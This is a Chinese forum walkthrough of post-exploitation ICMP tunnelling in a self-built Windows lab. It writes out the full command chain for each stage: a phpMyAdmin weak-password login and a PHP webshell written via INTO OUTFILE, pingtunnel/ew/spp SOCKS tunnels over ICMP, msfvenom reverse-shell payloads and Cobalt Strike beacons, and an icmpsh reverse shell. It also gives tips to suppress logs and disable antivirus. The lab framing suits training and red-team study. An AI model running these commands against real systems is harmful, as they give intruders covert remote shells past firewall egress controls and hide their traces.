问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
icmp隧道搭建
渗透测试
## 前言 在后渗透中内网隧道是必不可少的,在能够TCP出网的情况下搭建隧道是最容易的,使用frp即稳定又方便,搭建几级代理都不是问题。但是也有很多TCP不出网的情况,在这种场景下搭建隧道就...
前言 -- 在后渗透中内网隧道是必不可少的,在能够TCP出网的情况下搭建隧道是最容易的,使用frp即稳定又方便,搭建几级代理都不是问题。但是也有很多TCP不出网的情况,在这种场景下搭建隧道就要另寻门路了。为了方便学习内网隧道技术,我在公司的内网环境搭建了基于windows系统的苛刻的隧道环境,其实很简单,都是windows自带防火墙的一些规则策略。通过各种尝试,终于完成此环境(不知道有没有别的问题),现在把过程分享给大家\\~路过的师傅都来看看呀,有不正确的地方求教教我^^ data:image/s3,"s3://crabby-images/add76/add761807798667af3fa2d22200a17a1b335afeb" alt="001" 通过环境搭建,满足以下条件: 192.168.3.76(kali)模拟公网vp/s地址,WEB服务器1(windows server2019)模拟公司对外提供Web服务的机器,该机器可以通内网,同时向公网提供服务。内网同网段存在一台WIndows内网服务器,Web服务器可以访问该机器远程桌面。当我们拿到web服务器1的shell之后发现只能使用icmp协议访问公网vp/s(ping),所以只能用ICMP搭建通往内网的隧道,访问内网服务器进行后续攻击操作。 **windows环境:** 系统:windows server 2019(WEB服务器)、windows server2008 R2(内网服务器) WEB服务器1使用phpstudy搭建web服务,防火墙配置策略能访问内网服务器。隧道打通之后可以用来访问内网服务器远程桌面测试。 工具:phpstudy 用来开启web服务,web服务直接使用phpstudy默认功能即可(phpstudy探针+phpmyadmin弱口令)。WEB服务器防火墙入站规则仅开启80端口TCP,用来攻击获取shell。 一、获取WEB服务器shell --------------- ### 1 phpstudy探针得到网站路径 ```php C:/phpStudy/WWW ``` data:image/s3,"s3://crabby-images/96a85/96a850ef5f124be75d9cc42250a7ad89dd186a85" alt="055" ### 2 phpmyadmin弱口令root/root ```php http://192.168.3.88/phpmyadmin ``` 通过phpstudy开启的服务,使用弱口令连接phpmyadmin data:image/s3,"s3://crabby-images/bf5c8/bf5c84f1cd5aa8f3fb84f12fe9c61c940e202688" alt="056" ### 3 写入webshell ```php show global variables like '%secure_file_priv%'; NULL 不允许导入或导出 /tmp 只允许在 /tmp 目录导入导出 空 不限制目录 ``` 这里是空值 data:image/s3,"s3://crabby-images/7f9a7/7f9a78611051f0ca622a1ce0c6f60592cf7ff4e0" alt="057" 写入webshell ```php select '<?php @e val($_POST[ch4nge]);?>' into outfile 'C:/phpStudy/WWW/ch4nge.php'; ``` data:image/s3,"s3://crabby-images/7c903/7c90329dde90d709eae0515726d5d7a57464b351" alt="058" ### 4 蚁剑连接 data:image/s3,"s3://crabby-images/bd9cb/bd9cbb7bd34805252b2ff0067a345c304d69f702" alt="059" 二、ew+pingtunnel组合建立socks5隧道 --------------------------- **ew** EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 ```php https://github.com/idlefire/ew ``` **pingtunnel** pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具 **注意,在客户端中运行一定要加noprint nolog两个参数,否则会生成大量的日志文件** **由于ICMP为网络层协议,应用层防火墙无法识别,且请求包当中的数据字段被加密** ```php https://github.com/esrrhs/pingtunnel ``` ### 1 v/ps-kali执行 ```php ./ew_for_linux64 -s rcsocks -l 10080 -e 8898 ./pingtunnel -type server ``` 将8898收到的请求转发至10080端口 data:image/s3,"s3://crabby-images/3fe76/3fe767306ad81a02fd5bc158f0727c15c2d449dc" alt="060" data:image/s3,"s3://crabby-images/8f3c1/8f3c1cb21a254713e588e932aec0252792e6cfc8" alt="061" ### 2 WEB服务器执行pingtunnel ```php pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.3.76 -t 192.168.3.76:8898 -sock5 -1 -noprint 1 -nolog 1 ``` data:image/s3,"s3://crabby-images/99e09/99e09ca7178c1f6b250187fdd79e6adefdcc424e" alt="62.jpg" data:image/s3,"s3://crabby-images/877ab/877ab7df3d113bea9aa529b1c8c106daa00bf203" alt="063" ### 3 WEB服务器执行ew ```php ew.exe -s rssocks -d 127.0.0.1 -e 9999 ``` data:image/s3,"s3://crabby-images/95566/95566708703615fa084bdb5bef360d4403962a3c" alt="064" ew回显OK,隧道已打通! data:image/s3,"s3://crabby-images/74839/74839d3ebf7bf73d4f7464dff643cb0104fa4ec7" alt="065" ### 4 连接代理 使用proxifier设置代理 data:image/s3,"s3://crabby-images/dffc7/dffc7adf5fc3356ba4453ac60a15a5e77f0c2556" alt="066" 远程桌面测试 data:image/s3,"s3://crabby-images/d2ef4/d2ef4c5048e50ae790145cd67a1e1b60575ba54d" alt="067" 远程桌面测试 data:image/s3,"s3://crabby-images/6d7a7/6d7a758fa923e9dc8b06addb44730d4a8c12e028" alt="068" data:image/s3,"s3://crabby-images/304f4/304f4bded9a1d5287658b8e2aab495bee6df619a" alt="069" data:image/s3,"s3://crabby-images/10dcd/10dcd4ce087709fc73b6259db1bf059a070dee31" alt="070" 三、pingtunnel上线MSF&CS ---------------------------- ### 1 pingtunnel下载链接 **注意,在客户端中运行一定要加noprint nolog两个参数,否则会生成大量的日志文件** **由于ICMP为网络层协议,应用层防火墙无法识别,且请求包当中的数据字段被加密** ```php https://github.com/esrrhs/pingtunnel/releases ``` ### 2 v/ps服务端开启 ```php ./pingtunnel -type server ##开启服务器模式 ``` 回显0连接 data:image/s3,"s3://crabby-images/8c05e/8c05ea4199df1da048c6b58d2d4bfdd57d5e4db4" alt="071" ### 3 客户端开启 上传客户端 data:image/s3,"s3://crabby-images/fd290/fd290dd6536d585134551e6535bcd23cbbf5d811" alt="072" ```php pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1 pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.3.76 -t 192.168.3.76:7777 -tcp 1 -noprint 1 -nolog 1 ``` data:image/s3,"s3://crabby-images/c7004/c7004d176af27a9096c76bab8b7c331808da2c8f" alt="073" 客户端本地监听9999端口 ,将监听到的连接通过icmpserver发送到Linsten\_ip:7777端口 执行后,kali有回显 data:image/s3,"s3://crabby-images/fe2a8/fe2a8596e109c1acf71e883f263ee986619c3a66" alt="074" ### 4 MSF上线 制作木马,木马的回连地址为127.0.0.1:9999,运行上线 MSF ```php msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=9999 -f exe -o ch4nge.exe ``` data:image/s3,"s3://crabby-images/64154/64154b94c9b9acc07343ae46ffa52d845bdfb168" alt="075" 监听 ```php msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.3.76; set lport 7777; exploit -j; " ``` data:image/s3,"s3://crabby-images/7a090/7a090c23548454ecff776a11db1ee950a663c94b" alt="076" 把木马ch4nge.exe从蚁剑上传到靶机,运行 data:image/s3,"s3://crabby-images/0211a/0211afd751078b0d8e6349ca346ad0e6856995f6" alt="077" data:image/s3,"s3://crabby-images/5b4b8/5b4b8b9be545b0e99432ee4a2f7adc0064736bdb" alt="078" ### 5 CS上线 ```php pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.3.76 -t 192.168.3.76:7777 -tcp 1 -noprint 1 -nolog 1 ``` 建立监听127.0.0.1:9999和192.168.3.76:7777 data:image/s3,"s3://crabby-images/ad6c0/ad6c049e2e28c1398e0addd8500b1538a7d37713" alt="079" 对ICMP-127的监听生成木马ch4nge2.exe,传到靶机运行 data:image/s3,"s3://crabby-images/7982c/7982cec8f4cb2636e38b979aff3e2d33ff461091" alt="080" CS监听上线 data:image/s3,"s3://crabby-images/c390e/c390eb177bef887a9e64c58e59280a375b875b4f" alt="081" data:image/s3,"s3://crabby-images/ab234/ab234c38f0f4f36e4b813c9420728ae6f01ce95f" alt="082" 四、spp搭建socks5隧道 --------------- **反向代理用于进入目标内网,正向代理可配合远控工具进行上线** ```php 功能 支持的协议:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理 协议和类型可以自由组合 外部代理协议和内部转发协议可以自由组合 支持shadowsock/s插件,spp-shadowsock/s-plugin,spp-shadowsock/s-plugin-android ``` ### 1 下载 ```php https://github.com/esrrhs/spp https://github.com/esrrhs/spp/releases ``` ### 2 V/PS执行 ```php ./spp -type server -proto ricmp -listen 0.0.0.0 ``` data:image/s3,"s3://crabby-images/bc2ce/bc2ce2eb104993a0fa6a48db8e75940c17c7aa11" alt="083" ### 3 WEB服务器执行 ```php spp.exe -name "test" -type reverse_socks5_client -server v/ps -fromaddr :8080 -proxyproto tcp -proto ricmp spp.exe -name "test" -type reverse_socks5_client -server 192.168.3.76 -fromaddr :8080 -proxyproto tcp -proto ricmp ``` data:image/s3,"s3://crabby-images/83832/838328e87144a2333c3aaca69d6401178a7714fe" alt="084" V/PS回显 data:image/s3,"s3://crabby-images/37815/378152b675be057ab581e8bb8db87b483f6f14c9" alt="085" data:image/s3,"s3://crabby-images/2333f/2333fc6a2fe11435ac789195b575a7efab24dd70" alt="086" 成功搭建隧道! ### 4 设置代理 socks5:v/ps:8080 192.168.3.76:8080 data:image/s3,"s3://crabby-images/08a74/08a749faed43b6de51a3b4d331831c1b9b125319" alt="087" 远程连接内网服务器 data:image/s3,"s3://crabby-images/2b680/2b680cfe54f404d67b08a205e6c695f7927d9342" alt="088" data:image/s3,"s3://crabby-images/d73d6/d73d6ce0394c1c1c7b4416d12ad66d25795a038f" alt="089" 结束! 五、spp上线CS --------- ### 1 V/PS执行 ```php ./spp -type server -proto ricmp -listen 0.0.0.0 ``` data:image/s3,"s3://crabby-images/cf264/cf2643c401582fd9e2f2f5bbae993153ee4d32fb" alt="090" ### 2 WEB服务器执行 ```php spp -name "test" -type proxy_client -server v/ps -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp spp -name "test" -type proxy_client -server 192.168.3.76 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp # -nolog 1不输出日志,-noprint 1不打印内容 spp.exe -name "test" -type proxy_client -server 192.168.3.76 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1 ``` data:image/s3,"s3://crabby-images/dcc64/dcc64660fe78fc72ea517196e244c955e6bd1054" alt="091" ### 3 CS监听上线 建立监听127.0.0.1:8082和192.168.3.76:8081 data:image/s3,"s3://crabby-images/d9924/d9924662e9b6dbd1aebee79b765ff61a6c658c64" alt="092" 对spp-127的监听生成木马ch4nge3.exe,传到靶机运行 **CS监听上线** data:image/s3,"s3://crabby-images/84767/8476726fda7505464d308cd606275461b2a8d557" alt="093" V/PS回显 data:image/s3,"s3://crabby-images/a47a0/a47a03db333d9bc7c94f1856d163d4f2206bbb87" alt="094" **wireshark捕获数据** data:image/s3,"s3://crabby-images/15148/15148a0aaaec39bf960997acbb8876d1b9810947" alt="095" 六、icmpsh反弹shell --------------- ### 0 icmpsh简介 icmpsh 是一个简单的反向 ICMP shell,带有一个 win32 从站和一个 C、Perl 或 Python 中的 POSIX 兼容主站。与其他类似的开源工具相比,它的主要优势在于它不需要管理权限即可在目标机器上运行。 该工具干净、简单且便携。该目标Windows机器上从(客户端)运行,它是用C写的,在Windows受害者机器上运行服务器端,在攻击者机器上的任何平台上运行服务端。 ### 1 下载地址 ```php https://github.com/bdamele/icmpsh ``` ### 2 工具安装 **如果遇到报错,请看下面的报错解决方法** ```php #下载工具 git clone https://github.com/inquisb/icmpsh.git #安装依赖 apt-get install python-impacket #关闭本地ICMP应答 sysctl -w net.ipv4.icmp_echo_ignore_all=1 ``` ### 3 V/PS-kali运行icmpsh的控制端 ```php python icmpsh_m.py v/ps-ip attack-ip python icmpsh_m.py 192.168.3.76 192.168.3.88 ``` data:image/s3,"s3://crabby-images/80474/804743c722b744cbc002f5a847a5d730d05040f9" alt="096" ### 4 WEB服务器运行 ```php icmpsh.exe -t 192.168.3.76 ``` data:image/s3,"s3://crabby-images/7d9aa/7d9aa939402f44079f5aac49e728648d623aef1a" alt="097" v/ps接收到shell data:image/s3,"s3://crabby-images/e4739/e4739e8bf11b7cf06f957bed258e0e1dba12ab5a" alt="098" 使用wireshark抓包可以看到数据包都是ICMP协议 data:image/s3,"s3://crabby-images/3d295/3d295ca154599677e960fb86bc972fe77ba214b3" alt="099" ### 5 报错解决 `You need to<span> </span>``install``Python Impacket library first` 解决: ```php git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip install -r requirements.txt python setup.py install ``` 如果第三行命令报错 data:image/s3,"s3://crabby-images/01ace/01ace683b0b8d8d04d225cd5e967dbef9651b2a9" alt="100" 切换普通用户再执行 data:image/s3,"s3://crabby-images/a7a85/a7a8506e0c1ecbe317918cda3f94080e984233ed" alt="101" 安装完成后切换用户进行监听 ### 6 局限性 V/PS和WEB服务器必须要能够相互ping通 七、附:隧道场景搭建 ---------- windows server 2019环境-icmp出网环境搭建记录 ### 1 WEB服务器环境搭建 设置Windows防火墙策略 ### 1) 启用防火墙 data:image/s3,"s3://crabby-images/f4037/f40373e03d6ee18711b9ccc06039622bf516875c" alt="002" ### 2) 防火墙高级设置(重点) **(1)设置阻止入站/出站连接** 打开高级设置 data:image/s3,"s3://crabby-images/1c4b0/1c4b0cea6bd783740079c80a49016fe1ec401714" alt="003" 选择属性 data:image/s3,"s3://crabby-images/52d2a/52d2abd8ea5bc3ff643121b225ee0fb2dbb8eb95" alt="004" data:image/s3,"s3://crabby-images/a52ef/a52efad3e24be5a98e6efa99865137ebf6c266fa" alt="005" 域配置文件、专用配置文件、公用配置文件这三个标签中出站连接设置为阻止,确定 再次查看 data:image/s3,"s3://crabby-images/652d8/652d823930427a3928dcb6f31134e6bb688259d3" alt="006" **(2)禁用全部已启用的入站规则** 选择入站规则,按照已启用排序,把启用的规则选中,全部禁用 data:image/s3,"s3://crabby-images/a7743/a7743d58aeb3d36eb86300c1af2ea77a343e7440" alt="007" data:image/s3,"s3://crabby-images/a1e87/a1e87256730a3d77ef420830db112dfa95e45e56" alt="008" **(3)新建入站规则:允许80端口tcp入站** 新建一个web服务,仅TCP的80端口入站 data:image/s3,"s3://crabby-images/9e644/9e64459c3916bbb537bdbc675a7f15db5babf2c9" alt="009" 选择端口,下一步 data:image/s3,"s3://crabby-images/7512c/7512ce42688dc2583f565ca4c28f697b12249da0" alt="010" 选择tcp,输入特定端口80 data:image/s3,"s3://crabby-images/217ed/217edde05d12909ad25a841644d3fb2bed2c6860" alt="011" 默认选择允许连接,下一步 data:image/s3,"s3://crabby-images/c471e/c471e53de70b22883c434bdd7a70be735d55a4af" alt="012" 选择专用 公用,下一步 data:image/s3,"s3://crabby-images/d4221/d422197194e75fd12e172d3a85d6075b4742b3f5" alt="013" 随便命名,完成 data:image/s3,"s3://crabby-images/8d0a3/8d0a31194382f03a6b8bfc31b1e69cad0e0686dd" alt="014" **(4)新建出站规则:允许ICMP协议出站** 禁用全部已启用的出站规则:同样点击出站规则,把启用的全部禁用掉 新建一个基于icmp协议的规则 data:image/s3,"s3://crabby-images/6abe8/6abe8a1b34f7ec51b85c52d24914d0aa1b922500" alt="015" 选择自定义,协议和端口 data:image/s3,"s3://crabby-images/fee86/fee869c6ebfbca88279434bc476c4bb960ef1e9f" alt="016" 默认,下一步 data:image/s3,"s3://crabby-images/657b9/657b98d9958e3ec7bd893ecbf372cf205feac99b" alt="017" 协议类型选择icmpv4,其余默认,下一步。"这里可以查看几个协议的协议号" data:image/s3,"s3://crabby-images/3a2e3/3a2e3fee4412e1fc306f34573f12f1f624aaa058" alt="018" 作用域默认任何IP地址,下一步 data:image/s3,"s3://crabby-images/c114a/c114a2552e9baebc2be3d3716c847c7c1859db0f" alt="019" 选择允许连接,下一步 data:image/s3,"s3://crabby-images/053aa/053aad1bee4c9d89c462213bceabc5fafaabb799" alt="020" 选择专用、公用,下一步 data:image/s3,"s3://crabby-images/d28d1/d28d1d80084f92fbfaa3595bdf25b9594d43073f" alt="021" 输入命名,完成 data:image/s3,"s3://crabby-images/18b2e/18b2eb9a01ee7d97fe8b4e453fbc7bcff984c4d6" alt="022" - - - - - - **(5)新建出站规则:允许连接内网服务器** 开启对内网服务器172.16.5.100所有访问权限。 data:image/s3,"s3://crabby-images/f86eb/f86eb5279b3fa6b3752eb65d09730c9cbf3a101b" alt="023" 选择自定义,下一步 data:image/s3,"s3://crabby-images/e121d/e121d811a85f3ada4b7afffd4381f5f25bc443e5" alt="024" 默认选择所有程序,下一步 data:image/s3,"s3://crabby-images/b0634/b06340fb51c02f090e2eb4255c95f4b5ed9fcaf0" alt="025" 默认,下一步 data:image/s3,"s3://crabby-images/e00fd/e00fd785fec8265d0191c45dad9064cceed41737" alt="026" 远程ip地址设置为176.16.5.100 data:image/s3,"s3://crabby-images/cc511/cc511e85c6cd1e81ac64e3f0da44ae193e20a698" alt="027" 选择允许连接,下一步 data:image/s3,"s3://crabby-images/3edb0/3edb00f54dd429a5dd9173b0a8d4b76b56ac086b" alt="028" 选择专用、公用,下一步 data:image/s3,"s3://crabby-images/eaadf/eaadfca9c07508954e03d050bab749e5341330f3" alt="029" data:image/s3,"s3://crabby-images/80fb9/80fb94957621c7d8f5e957e7a849f2b0b4046f2c" alt="030" **(6)新建入站规则:允许远程桌面连接自己** 用来对Ptunnel工具测试使用 新建入站规则,选择自定义,下一步 data:image/s3,"s3://crabby-images/c2e6a/c2e6a24bd7a2a182393db77016655160b202fa89" alt="031" 默认,下一步 data:image/s3,"s3://crabby-images/b7077/b7077620280278f1f862e40fa29e660db3a57fca" alt="032" 默认,下一步 data:image/s3,"s3://crabby-images/62f68/62f6809f58ca86f112fcbc9045a852380c109279" alt="033" 这里设置远程ip地址为本地地址(这里没有过多测试,这样设置能达到目的) data:image/s3,"s3://crabby-images/30d63/30d631f0bbee13e6bb92538494556c0522437382" alt="034" 默认,允许连接,下一步 data:image/s3,"s3://crabby-images/3edf8/3edf80573b28c7b1132a264e86d926c700c1a2a5" alt="035" 选择专用、公用,下一步 data:image/s3,"s3://crabby-images/9a5cc/9a5cc81b9cd4488a139c61da01569618f1c5212e" alt="036" 命名,完成 data:image/s3,"s3://crabby-images/dbb5e/dbb5ea4af966add3f5194b682c050e529e21c1ea" alt="037" ### 3) phpStudy搭建WEB服务 先安装vc9\_x86.exe,然后安装phpstudy。路径C:\\phpstudy data:image/s3,"s3://crabby-images/41419/41419f31bd22381480fb9c71a94ff4a74c676a29" alt="038" ### 4) 关闭windows病毒与威胁防护 data:image/s3,"s3://crabby-images/5f4c2/5f4c251ef660d87e722ebce165d18d91134da268" alt="039" - - - - - - ### 2 内网服务器环境搭建 ### 1) 开启防火墙 data:image/s3,"s3://crabby-images/cf19a/cf19a9b5b1ec030caf895b5e53bb8d53244764b5" alt="040" ### 2) 禁用所有开启的入站规则,新建入站规则:仅允许WEB服务器访问 新建规则 data:image/s3,"s3://crabby-images/f2994/f299482436518b0b6155b9b43f9750b4fea1f217" alt="041" 选择自定义,下一步 data:image/s3,"s3://crabby-images/57c0c/57c0c83b5f797e7904fa5843064b674a500dd9e8" alt="042" 默认所有程序,下一步 data:image/s3,"s3://crabby-images/78c29/78c29dab050191fc1acfeb97cd391efb61c5d015" alt="043" 默认,下一步 data:image/s3,"s3://crabby-images/636b8/636b849c80c9ee4059cb4aa9463272a86f0a4fa4" alt="044" 远程IP只写一个172.16.5.60(WEB服务器第二网卡) data:image/s3,"s3://crabby-images/1001a/1001a706580d3a69182a0b81f7d32361d9e79559" alt="045" 默认,下一步 data:image/s3,"s3://crabby-images/e2957/e2957c8f8dd93513e2caf528fe841656dd2ff9d6" alt="046" 选择专用、公用,下一步 data:image/s3,"s3://crabby-images/85624/85624b3e42e653fa23eb74742e784877ec1bd260" alt="047" 命名,完成 data:image/s3,"s3://crabby-images/9127e/9127ed0bffcb26e00422eb0d848dec1615a76ad6" alt="048" ### 3) 开启允许远程桌面 data:image/s3,"s3://crabby-images/ababd/ababdf68df37251a425ce095d88a1521165667af" alt="049" ### 4) 环境测试 **80端口tcp入站情况测试** 开启服务后,windows攻击机可以通过ip进行访问web服务 data:image/s3,"s3://crabby-images/96259/962590c64f978bca0bbb82e2388494f0f45f9ea8" alt="050" **ping测试** windows攻击机不能ping通环境机器 data:image/s3,"s3://crabby-images/cedeb/cedeb0ebbb7aa204df4f395930afa3130bc0c2ee" alt="051" 环境机器可以ping通其他机器 data:image/s3,"s3://crabby-images/67c75/67c75e143037c22a016b7e9c7888606dbe2fb93e" alt="052" **环境tcp不出网测试** 环境机器无法访问百度的网站(tcp) data:image/s3,"s3://crabby-images/32472/324728fc3963483b35ce442f9b9a96c07c67cff7" alt="053" 只能访问172.16.5.100的服务 data:image/s3,"s3://crabby-images/93343/93343b54cbf88a7418dd08c3d6562d44818d28d6" alt="054" 八、参考文章&&工具下载 ---------------------------- **spp**参考https://xz.aliyun.com/t/9820#toc-11 **pingtunnel**参考[perng师傅](https://https//www.perng.cn)文章 **工具下载** ```php 链接:https://pan.baidu.com/s/1_O8-1zpno7siXiXiL_B4NQ 提取码:nhxn ```
发表于 2021-08-17 17:58:57
阅读 ( 7347 )
分类:
内网渗透
0 推荐
收藏
0 条评论
请先
登录
后评论
>一
1 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!